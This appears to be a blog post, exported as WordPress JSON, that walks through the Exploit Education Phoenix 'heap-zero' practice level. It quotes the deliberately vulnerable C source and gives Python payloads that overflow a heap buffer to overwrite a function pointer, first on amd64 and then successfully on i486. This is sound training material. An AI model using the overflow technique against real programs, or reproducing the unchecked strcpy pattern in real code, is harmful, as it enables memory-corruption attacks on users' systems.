{"id":624,"date":"2019-08-08T14:43:34","date_gmt":"2019-08-08T18:43:34","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=624"},"modified":"2019-08-16T13:06:39","modified_gmt":"2019-08-16T17:06:39","slug":"exploit-education-phoenix-heap-zero-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/exploit-education-phoenix-heap-zero-solution\/","title":{"rendered":"Exploit Education | Phoenix | Heap Zero Solution"},"content":{"rendered":"

The description and source code can be found here:
\nhttp:\/\/exploit.education\/phoenix\/heap-zero\/<\/a><\/p>\n

This is the first of the heap exploitation levels. We can see what’s going on just by looking at the source for the main() <\/span>function:<\/p>\n

int main(int argc, char **argv) {\r\n    struct data *d;\r\n    struct fp *f;\r\n\r\n    printf("%s\\n", BANNER);\r\n\r\n    if (argc < 2) {\r\n        printf("Please specify an argument to copy :-)\\n");\r\n        exit(1);\r\n    }\r\n\r\n    d = malloc(sizeof(struct data));\r\n    f = malloc(sizeof(struct fp));\r\n    f->fp = nowinner;\r\n\r\n    strcpy(d->name, argv[1]);\r\n\r\n    printf("data is at %p, fp is at %p, will be calling %p\\n", d, f, f->fp);\r\n    fflush(stdout);\r\n\r\n    f->fp();\r\n\r\n    return 0;\r\n}<\/pre>\n
Two pointers are declared right next to each other, *d and *f. Memory is allocated for them on the heap using malloc()<\/span>. *f is set to point to the nowinner() <\/span>function. Data is copied from the first command line argument to the *d pointer. A handy little message is displayed about the addresses these pointers have and the address that will be called. Finally, the address the *f pointer holds is called. It looks like this’ll be a simple buffer overflow exploit.<\/p>\n
First, I’ll check the address of the winner() <\/span>function to see what I need to set the *f pointer to. Of course, I’ll try this in the amd64 architecture first:<\/p>\n
$ nm \/opt\/phoenix\/amd64\/heap-zero | grep winner\r\n0000000000400ace T nowinner\r\n0000000000400abd T winner<\/pre>\n
And right away I see a problem. I’ll need to put the address 0x400abd into the *f pointer. However, 0x0a is a newline character. The strcpy() <\/span>function will see that, strip it, ignore anything after it, and terminate the string with a null byte. I’ll try it. First, I’ll run the program with any ‘ol input to see the addresses & calculate how much to overflow the buffer with:<\/p>\n
$ cd \/opt\/phoenix\/amd64\/\r\n\r\n$ .\/heap-zero hello\r\nWelcome to phoenix\/heap-zero, brought to you by https:\/\/exploit.education\r\ndata is at 0x7ffff7ef6010, fp is at 0x7ffff7ef6060, will be calling 0x400ace\r\nlevel has not been passed - function pointer has not been overwritten\r\n\r\n$ python -c 'print (0x60 - 0x10)'\r\n80<\/pre>\n
I’ll need to input 80 junk bytes before getting to the *f pointer, which holds the address of the function to be called.<\/p>\n
$ .\/heap-zero $(python -c 'print "A"*80 + "\\xbd\\x0a\\40"')\r\nWelcome to phoenix\/heap-zero, brought to you by https:\/\/exploit.education\r\ndata is at 0x7ffff7ef6010, fp is at 0x7ffff7ef6060, will be calling 0x4000bd\r\nSegmentation fault<\/pre>\n
As you can see, we ended up with 0x4000bd instead of the expected 0x400abd. I can probably get around this by putting some shellcode in the buffer that jumps to the right location, and I’ll probably come back to this and do that later. But for now, I’ll stick to the x86 architecture for the Heap levels.<\/p>\n
$ cd \/opt\/phoenix\/i486\r\n\r\n$ .\/heap-zero hello\r\nWelcome to phoenix\/heap-zero, brought to you by https:\/\/exploit.education\r\ndata is at 0xf7e69008, fp is at 0xf7e69050, will be calling 0x804884e\r\nlevel has not been passed - function pointer has not been overwritten\r\n\r\n$ python -c 'print (0x50 - 0x8)'\r\n72\r\n\r\n$ nm heap-zero | grep winner\r\n0804884e T nowinner\r\n08048835 T winner\r\n\r\n$ .\/heap-zero $(python -c 'print "A"*72 + "\\x35\\x88\\x04\\x08"')\r\nWelcome to phoenix\/heap-zero, brought to you by https:\/\/exploit.education\r\ndata is at 0xf7e69008, fp is at 0xf7e69050, will be calling 0x8048835\r\nCongratulations, you have passed this level<\/pre>\n","protected":false},"excerpt":{"rendered":"
This level provides an introduction to heap data manipulation, and how that can affect program execution … Continue readingExploit Education | Phoenix | Heap Zero Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-624","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=624"}],"version-history":[{"count":7,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/624\/revisions"}],"predecessor-version":[{"id":671,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/624\/revisions\/671"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}